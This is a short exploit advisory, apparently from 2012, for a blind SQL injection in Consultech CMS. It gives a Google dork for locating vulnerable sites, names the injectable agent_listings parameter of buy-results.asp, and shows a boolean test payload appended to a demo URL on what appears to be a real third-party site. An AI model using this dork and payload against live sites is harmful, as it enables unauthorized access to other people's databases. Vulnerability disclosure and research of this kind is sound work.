# Exploit Title: Consultech cms Blind Sql Injection 

# Google Dork: inurl:buy-results.asp?agent_listings intext:Powered by Consultech

# Date: 08/22/2012

# Author: Crim3R

# Vendor Home : http://www.consultech.net/

# Tested on: all
==================================
 
 the agent_listings parametr is agent_listings to blind sql injection
    http://127.0.0.1/public/buy-results.asp?agent_listings=[id][Bsqli] 

D3m0:

http://www.homefinder.org/public/buy-results.asp?agent_listings=3830146045 and 
2*5=10

===============Crim3R@Att.Net=========

$Home = %00

thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir